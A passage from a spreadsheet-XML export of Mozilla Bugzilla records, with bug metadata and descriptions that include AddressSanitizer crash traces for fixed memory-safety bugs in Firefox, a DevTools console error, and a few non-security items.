    #6 0x7f82d913d412 in mozilla::dom::Request::Constructor(mozilla::dom::GlobalObject const&amp;, mozilla::dom::RequestOrUSVString const&amp;, mozilla::dom::RequestInit const&amp;, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/fetch/Request.cpp:268:10
    #7 0x7f82d913b73d in mozilla::dom::FetchRequest(nsIGlobalObject*, mozilla::dom::RequestOrUSVString const&amp;, mozilla::dom::RequestInit const&amp;, mozilla::dom::CallerType, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/fetch/Fetch.cpp:454:7
    #8 0x7f82d8143ffd in fetch /builds/worker/workspace/obj-build/dom/bindings/WindowBinding.cpp:19041:60
    #9 0x7f82d8143ffd in mozilla::dom::Window_Binding::fetch_promiseWrapper(JSContext*, JS::Handle&lt;JSObject*&gt;, void*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/obj-build/dom/bindings/WindowBinding.cpp:19057:13
    #10 0x7f82d8967b82 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::MaybeCrossOriginObjectThisPolicy, mozilla::dom::binding_detail::ConvertExceptionsToPromises&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3221:13
    #11 0x7f82df0e4f0b in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:487:13
    #12 0x7f82df0e4f0b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:579:12
    #13 0x7f82df0e71a8 in InternalCall(JSContext*, js::AnyInvokeArgs const&amp;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:642:10
    #14 0x7f82df0cd77f in CallFromStack /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:646:10
    #15 0x7f82df0cd77f in Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3314:16
    #16 0x7f82df0b0761 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:459:10
    #17 0x7f82df0e4fed in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:614:13
    #18 0x7f82df0e71a8 in InternalCall(JSContext*, js::AnyInvokeArgs const&amp;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:642:10
    #19 0x7f82df0e7486 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:659:8
    #20 0x7f82df742e30 in js::CallSelfHostedFunction(JSContext*, JS::Handle&lt;js::PropertyName*&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/SelfHosting.cpp:1719:10
    #21 0x7f82df36779c in AsyncFunctionResume(JSContext*, JS::Handle&lt;js::AsyncFunctionGeneratorObject*&gt;, ResumeKind, JS::Handle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/AsyncFunction.cpp:128:8
    #22 0x7f82df4b0d61 in AsyncFunctionPromiseReactionJob /builds/worker/checkouts/gecko/js/src/builtin/Promise.cpp:1700:10
    #23 0x7f82df4b0d61 in PromiseReactionJob(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/js/src/builtin/Promise.cpp:1852:12
    #24 0x7f82df0e4f0b in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:487:13
    #25 0x7f82df0e4f0b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:579:12
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/obj-build/dist/include/nsTArray.h:413:37 in Length
Shadow bytes around the buggy address:
  0x0c1e800042a0: fd fd fd fd fd fd fa fa fa fa fa fa fa fa 00 00
  0x0c1e800042b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1e800042c0: 00 00 00 00 fa fa fa fa fa fa fa fa fd fd fd fd
  0x0c1e800042d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1e800042e0: fd fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
=&gt;0x0c1e800042f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd
  0x0c1e80004300: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c1e80004310: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x0c1e80004320: fa fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00
  0x0c1e80004330: 00 00 00 00 00 00 00 00 00 00 04 fa fa fa fa fa
  0x0c1e80004340: fa fa fa fa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26094==ABORTING
```</t>
        </is>
      </c>
      <c r="X2393" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2394">
      <c r="A2394" t="n">
        <v>1563684</v>
      </c>
      <c r="B2394" t="inlineStr">
        <is>
          <t>2019-07-05 01:40:43 -0700</t>
        </is>
      </c>
      <c r="C2394" t="inlineStr">
        <is>
          <t>Console is blank on Gmail</t>
        </is>
      </c>
      <c r="D2394" t="inlineStr">
        <is>
          <t>2019-07-24 04:13:37 -0700</t>
        </is>
      </c>
      <c r="E2394" t="n">
        <v>1</v>
      </c>
      <c r="F2394" t="n">
        <v>1</v>
      </c>
      <c r="G2394" t="n">
        <v>3</v>
      </c>
      <c r="H2394" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2394" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J2394" t="inlineStr">
        <is>
          <t>Console</t>
        </is>
      </c>
      <c r="K2394" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2394" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2394" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2394" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2394" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2394" t="inlineStr"/>
      <c r="Q2394" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2394" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2394" t="inlineStr">
        <is>
          <t>Firefox 70</t>
        </is>
      </c>
      <c r="T2394" t="n">
        <v>1</v>
      </c>
      <c r="U2394" t="n">
        <v>0</v>
      </c>
      <c r="V2394" t="n">
        <v>10</v>
      </c>
      <c r="W2394" t="inlineStr">
        <is>
          <t>Here's the error message in the Browser Console:
&gt; uncaught exception: Protocol error (unknownError): error occurred while processing 'getCachedMessages': SecurityError: Permission denied to access property "windowUtils" on cross-origin object
Stack: getInnerWindowId@resource://devtools/server/actors/webconsole/utils.js:87:5
getInnerWindowIDsForFrames@resource://devtools/server/actors/webconsole/utils.js:99:32
getInnerWindowIDsForFrames@resource://devtools/server/actors/webconsole/utils.js:105:31
getInnerWindowIDsForFrames@resource://devtools/server/actors/webconsole/utils.js:105:31
getCachedMessages@resource://devtools/server/actors/webconsole/listeners/console-service.js:142:33
getCachedMessages@resource://devtools/server/actors/webconsole.js:861:24
onPacket@resource://devtools/server/main.js:1298:58
receiveMessage@resource://devtools/shared/transport/child-transport.js:66:16
Line: 87, column: 0
And then 
&gt; WebConsolePanel open failed. timeout: Connection timeout. Check the Error Console on both ends for potential error messages. Reopen the Web Console to try again. 
Object { error: "timeout", message: "Connection timeout. Check the Error Console on both ends for potential error messages. Reopen the Web Console to try again." }
panel.js:73:15
At the very least, we shouldn't timeout the connection if we couldn't get cached messages.</t>
        </is>
      </c>
      <c r="X2394" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2395">
      <c r="A2395" t="n">
        <v>506267</v>
      </c>
      <c r="B2395" t="inlineStr">
        <is>
          <t>2009-07-24 08:21:58 -0700</t>
        </is>
      </c>
      <c r="C2395" t="inlineStr">
        <is>
          <t>nsTableCellMap::Synchronize misplaced map</t>
        </is>
      </c>
      <c r="D2395" t="inlineStr">
        <is>
          <t>2018-07-06 11:42:51 -0700</t>
        </is>
      </c>
      <c r="E2395" t="n">
        <v>1</v>
      </c>
      <c r="F2395" t="n">
        <v>1</v>
      </c>
      <c r="G2395" t="n">
        <v>3</v>
      </c>
      <c r="H2395" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2395" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2395" t="inlineStr">
        <is>
          <t>Layout: Tables</t>
        </is>
      </c>
      <c r="K2395" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2395" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2395" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2395" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2395" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2395" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q2395" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2395" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2395" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T2395" t="n">
        <v>1</v>
      </c>
      <c r="U2395" t="n">
        <v>0</v>
      </c>
      <c r="V2395" t="n">
        <v>26</v>
      </c>
      <c r="W2395" t="inlineStr">
        <is>
          <t>code blob:
284   // Scope |map| outside the loop so we can use it as a hint.
285   nsCellMap* map = nsnull;
286   for (PRUint32 rgX = 0; rgX &lt; orderedRowGroups.Length(); rgX++) {
287     nsTableRowGroupFrame* rgFrame = orderedRowGroups[rgX];
288     map = GetMapFor((nsTableRowGroupFrame*)rgFrame-&gt;GetFirstInFlow(), map);
289     if (map) {
290       if (!maps.AppendElement(map)) {
291         delete map;
292         NS_WARNING("Could not AppendElement");
293       }
294     }
295   }
logic flow:
285   nsCellMap* map = nsnull;
286   for (PRUint32 rgX = 0; rgX &lt; orderedRowGroups.Length(); rgX++) {
288     map = GetMapFor((nsTableRowGroupFrame*)rgFrame-&gt;GetFirstInFlow(), map);
289     if (map) {
290       if (!maps.AppendElement(map)) {
291         delete map;
286   for (PRUint32 rgX = 0; rgX &lt; orderedRowGroups.Length(); rgX++) {
288     map = GetMapFor((nsTableRowGroupFrame*)rgFrame-&gt;GetFirstInFlow(), map);</t>
        </is>
      </c>
      <c r="X2395" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2396">
      <c r="A2396" t="n">
        <v>774548</v>
      </c>
      <c r="B2396" t="inlineStr">
        <is>
          <t>2012-07-16 18:12:31 -0700</t>
        </is>
      </c>
      <c r="C2396" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow in nsBlockFrame::MarkLineDirty</t>
        </is>
      </c>
      <c r="D2396" t="inlineStr">
        <is>
          <t>2024-05-29 16:02:39 -0700</t>
        </is>
      </c>
      <c r="E2396" t="n">
        <v>1</v>
      </c>
      <c r="F2396" t="n">
        <v>1</v>
      </c>
      <c r="G2396" t="n">
        <v>3</v>
      </c>
      <c r="H2396" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2396" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2396" t="inlineStr">
        <is>
          <t>Layout: Block and Inline</t>
        </is>
      </c>
      <c r="K2396" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2396" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2396" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2396" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2396" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2396" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+][qa?]</t>
        </is>
      </c>
      <c r="Q2396" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2396" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2396" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T2396" t="n">
        <v>1</v>
      </c>
      <c r="U2396" t="n">
        <v>0</v>
      </c>
      <c r="V2396" t="n">
        <v>14</v>
      </c>
      <c r="W2396" t="inlineStr">
        <is>
          <t>Created attachment 642817
Testcase
Reproduces on trunk.
=================================================================
==25348== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f07b3382ab4 at pc 0x7f07e1f45e62 bp 0x7fff73ddf550 sp 0x7fff73ddf548
READ of size 4 at 0x7f07b3382ab4 thread T0
    #0 0x7f07e1f45e62 in nsLineBox::IsInline() const asn1cmn.c:0
    #1 0x7f07e1f45647 in nsBlockFrame::MarkLineDirty(nsLineList_iterator, nsLineList const*) layout/generic/nsBlockFrame.cpp:1562
    #2 0x7f07e1f82d34 in nsBlockFrame::AddFrames(nsFrameList&amp;, nsIFrame*) layout/generic/nsBlockFrame.cpp:4990
    #3 0x7f07e1f8089d in nsBlockFrame::InsertFrames(mozilla::layout::FrameChildListID, nsIFrame*, nsFrameList&amp;) layout/generic/nsBlockFrame.cpp:4838
    #4 0x7f07e1b38e92 in nsFrameManager::InsertFrames(nsIFrame*, mozilla::layout::FrameChildListID, nsIFrame*, nsFrameList&amp;) layout/base/nsFrameManager.cpp:463
    #5 0x7f07e18a76f0 in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, bool) layout/base/nsCSSFrameConstructor.cpp:7332
    #6 0x7f07e18a06a9 in nsCSSFrameConstructor::ContentInserted(nsIContent*, nsIContent*, nsILayoutHistoryState*, bool) layout/base/nsCSSFrameConstructor.cpp:6814
    #7 0x7f07e1890a69 in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, bool) layout/base/nsCSSFrameConstructor.cpp:9263
    #8 0x7f07e18c0772 in nsCSSFrameConstructor::ProcessRestyledFrames(nsStyleChangeList&amp;) layout/base/nsCSSFrameConstructor.cpp:8008
    #9 0x7f07e18c6afd in nsCSSFrameConstructor::RestyleElement(mozilla::dom::Element*, nsIFrame*, nsChangeHint, mozilla::css::RestyleTracker&amp;, bool) layout/base/nsCSSFrameConstructor.cpp:8162
    #10 0x7f07e181129d in mozilla::css::RestyleTracker::ProcessOneRestyle(mozilla::dom::Element*, nsRestyleHint, nsChangeHint) layout/base/RestyleTracker.cpp:125
    #11 0x7f07e180b8d6 in mozilla::css::RestyleTracker::DoProcessRestyles() layout/base/RestyleTracker.cpp:210
    #12 0x7f07e18ee7ba in mozilla::css::RestyleTracker::ProcessRestyles() layout/base/RestyleTracker.h:70
    #13 0x7f07e18ee2ee in nsCSSFrameConstructor::ProcessPendingRestyles() layout/base/nsCSSFrameConstructor.cpp:11996
    #14 0x7f07e1cc088e in PresShell::FlushPendingNotifications(mozFlushType) layout/base/nsPresShell.cpp:3814
    #15 0x7f07e21a5d0c in nsGfxScrollFrameInner::AsyncScrollPortEvent::Run() layout/generic/nsGfxScrollFrame.cpp:2990
    #16 0x7f07e1c4ea65 in nsRootPresContext::FlushWillPaintObservers() layout/base/nsPresContext.cpp:2807
    #17 0x7f07e1c621b9 in nsRootPresContext::RunWillPaintObservers::Run() layout/base/nsPresContext.h:1381
    #18 0x7f07ecd040dd in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:625
    #19 0x7f07ec992e8d in NS_ProcessNextEvent_P(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:217
    #20 0x7f07eb980ea6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:82
    #21 0x7f07ecfb80ba in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:209
    #22 0x7f07ecfb7f03 in MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:202
    #23 0x7f07ecfb7de8 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:176
    #24 0x7f07eae9161e in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:165
    #25 0x7f07e9ae0f78 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:257
    #26 0x7f07e025e2a0 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3787
    #27 0x7f07e0264c42 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3864
    #28 0x7f07e0268112 in XRE_main toolkit/xre/nsAppRunner.cpp:3940
    #29 0x40c28f in do_main(int, char**) browser/app/nsBrowserApp.cpp:160
    #30 0x409cbd in main browser/app/nsBrowserApp.cpp:298
    #31 0x7f07fcc21c4d in ?? ??:0
0x7f07b3382ab4 is located 20 bytes to the right of 32-byte region [0x7f07b3382a80,0x7f07b3382aa0)
allocated by thread T0 here:
    #0 0x4a4452 in __interceptor_malloc ??:0
    #1 0x7f07f9aad717 in moz_xmalloc memory/mozalloc/mozalloc.cpp:54
    #2 0x7f07e1f66f4b in nsBlockFrame::PushLines(nsBlockReflowState&amp;, nsLineList_iterator) layout/generic/nsBlockFrame.cpp:4414
    #3 0x7f07e1f7630c in nsBlockFrame::PlaceLine(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFloatManager::SavedState*, nsRect&amp;, int&amp;, bool*) layout/generic/nsBlockFrame.cpp:4325
    #4 0x7f07e1f6cb5e in nsBlockFrame::DoReflowInlineFrames(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) layout/generic/nsBlockFrame.cpp:3764
    #5 0x7f07e1f5d897 in nsBlockFrame::ReflowInlineFrames(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:3482
    #6 0x7f07e1f4c24c in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:2570
    #7 0x7f07e1f316b1 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) layout/generic/nsBlockFrame.cpp:2020
    #8 0x7f07e1f2514f in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsBlockFrame.cpp:1069
    #9 0x7f07e2014c27 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) layout/generic/nsContainerFrame.cpp:906
    #10 0x7f07e1ff6b35 in nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) layout/generic/nsColumnSetFrame.cpp:665
    #11 0x7f07e1ffdcd7 in nsColumnSetFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsColumnSetFrame.cpp:920
    #12 0x7f07e1fb53bb in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) layout/generic/nsBlockReflowContext.cpp:262
    #13 0x7f07e1f566b7 in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:3206
    #14 0x7f07e1f4bda6 in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:2514
    #15 0x7f07e1f316b1 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) layout/generic/nsBlockFrame.cpp:2020
    #16 0x7f07e1f2514f in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsBlockFrame.cpp:1069
    #17 0x7f07e2014c27 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) layout/generic/nsContainerFrame.cpp:906
    #18 0x7f07e1ff6b35 in nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) layout/generic/nsColumnSetFrame.cpp:665
    #19 0x7f07e1ffdcd7 in nsColumnSetFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsColumnSetFrame.cpp:920
    #20 0x7f07e2014c27 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) layout/generic/nsContainerFrame.cpp:906
    #21 0x7f07e21e5eb7 in nsCanvasFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsCanvasFrame.cpp:429
    #22 0x7f07e2014c27 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) layout/generic/nsContainerFrame.cpp:906
    #23 0x7f07e215f54e in nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState*, bool, bool, nsHTMLReflowMetrics*, bool) layout/generic/nsGfxScrollFrame.cpp:518
    #24 0x7f07e2159c72 in nsHTMLScrollFrame::TryLayout(ScrollReflowState*, nsHTMLReflowMetrics*, bool, bool, bool, unsigned int*) layout/generic/nsGfxScrollFrame.cpp:363
==25348== ABORTING
Stats: 152M malloced (168M for red zones) by 363291 calls
Stats: 39M realloced by 19415 calls
Stats: 109M freed by 231030 calls
Stats: 0M really freed by 0 calls
Stats: 344M (88112 full pages) mmaped in 86 calls
  mmaps   by size class: 8:294894; 9:49146; 10:20475; 11:18423; 12:3072; 13:2048; 14:1536; 15:384; 16:576; 17:128; 18:176; 19:40; 20:12;
  mallocs by size class: 8:274461; 9:47542; 10:16571; 11:17710; 12:2504; 13:1857; 14:1429; 15:321; 16:571; 17:101; 18:172; 19:40; 20:12;
  frees   by size class: 8:162364; 9:36580; 10:13056; 11:14376; 12:1553; 13:942; 14:1230; 15:269; 16:470; 17:91; 18:52; 19:38; 20:9;
  rfrees  by size class:
Stats: malloc large: 325 small slow: 1903
Shadow byte and word:
  0x1fe0f6670556: fb
  0x1fe0f6670550: 00 00 00 00 fb fb fb fb
More shadow bytes:
  0x1fe0f6670530: fd fd fd fd fd fd fd fd
  0x1fe0f6670538: fd fd fd fd fd fd fd fd
  0x1fe0f6670540: fa fa fa fa fa fa fa fa
  0x1fe0f6670548: fa fa fa fa fa fa fa fa
=&gt;0x1fe0f6670550: 00 00 00 00 fb fb fb fb
  0x1fe0f6670558: fb fb fb fb fb fb fb fb
  0x1fe0f6670560: fa fa fa fa fa fa fa fa
  0x1fe0f6670568: fa fa fa fa fa fa fa fa
  0x1fe0f6670570: 00 00 00 00 00 00 00 00</t>
        </is>
      </c>
      <c r="X2396" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2397">
      <c r="A2397" t="n">
        <v>1208305</v>
      </c>
      <c r="B2397" t="inlineStr">
        <is>
          <t>2015-09-24 19:23:13 -0700</t>
        </is>
      </c>
      <c r="C2397" t="inlineStr">
        <is>
          <t>[user story] Information to assess the add-on should be available to the reviewer</t>
        </is>
      </c>
      <c r="D2397" t="inlineStr">
        <is>
          <t>2015-10-13 15:14:16 -0700</t>
        </is>
      </c>
      <c r="E2397" t="n">
        <v>1</v>
      </c>
      <c r="F2397" t="n">
        <v>1</v>
      </c>
      <c r="G2397" t="n">
        <v>5</v>
      </c>
      <c r="H2397" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2397" t="inlineStr">
        <is>
          <t>Tracking</t>
        </is>
      </c>
      <c r="J2397" t="inlineStr">
        <is>
          <t>User Story</t>
        </is>
      </c>
      <c r="K2397" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2397" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2397" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2397" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2397" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2397" t="inlineStr"/>
      <c r="Q2397" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2397" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2397" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2397" t="n">
        <v>1</v>
      </c>
      <c r="U2397" t="n">
        <v>0</v>
      </c>
      <c r="V2397" t="n">
        <v>2</v>
      </c>
      <c r="W2397" t="inlineStr">
        <is>
          <t>See: https://www.pivotaltracker.com/story/show/103691210
All the meta data about the add-on (i.e. all the things the developer can set and the user can see) should be displayed on single page.</t>
        </is>
      </c>
      <c r="X2397" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2398">
      <c r="A2398" t="n">
        <v>529480</v>
      </c>
      <c r="B2398" t="inlineStr">
        <is>
          <t>2009-11-17 22:15:22 -0800</t>
        </is>
      </c>
      <c r="C2398" t="inlineStr">
        <is>
          <t>Release 3.5.2 and 3.4.4</t>
        </is>
      </c>
      <c r="D2398" t="inlineStr">
        <is>
          <t>2009-11-18 22:08:33 -0800</t>
        </is>
      </c>
      <c r="E2398" t="n">
        <v>1</v>
      </c>
      <c r="F2398" t="n">
        <v>1</v>
      </c>
      <c r="G2398" t="n">
        <v>4</v>
      </c>
      <c r="H2398" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2398" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2398" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2398" t="inlineStr">
        <is>
          <t>3.4.3</t>
        </is>
      </c>
      <c r="L2398" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2398" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2398" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2398" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2398" t="inlineStr"/>
      <c r="Q2398" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2398" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2398" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2398" t="n">
        <v>1</v>
      </c>
      <c r="U2398" t="n">
        <v>0</v>
      </c>
      <c r="V2398" t="n">
        <v>11</v>
      </c>
      <c r="W2398" t="inlineStr">
        <is>
          <t>There is a security issue which requires us to do a release.</t>
        </is>
      </c>
      <c r="X2398" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2399">
      <c r="A2399" t="n">
        <v>1767590</v>
      </c>
      <c r="B2399" t="inlineStr">
        <is>
          <t>2022-05-04 01:27:32 -0700</t>
        </is>
      </c>
      <c r="C2399" t="inlineStr">
        <is>
          <t>Uninitialized variable leads to invalid/arbitrary memory read in S/MIME decryption</t>
        </is>
      </c>
      <c r="D2399" t="inlineStr">
        <is>
          <t>2024-05-30 10:56:11 -0700</t>
        </is>
      </c>
      <c r="E2399" t="n">
        <v>1</v>
      </c>
      <c r="F2399" t="n">
        <v>1</v>
      </c>
      <c r="G2399" t="n">
        <v>3</v>
      </c>
      <c r="H2399" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2399" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J2399" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K2399" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L2399" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2399" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2399" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2399" t="inlineStr">
        <is>
          <t>FIXED</t>
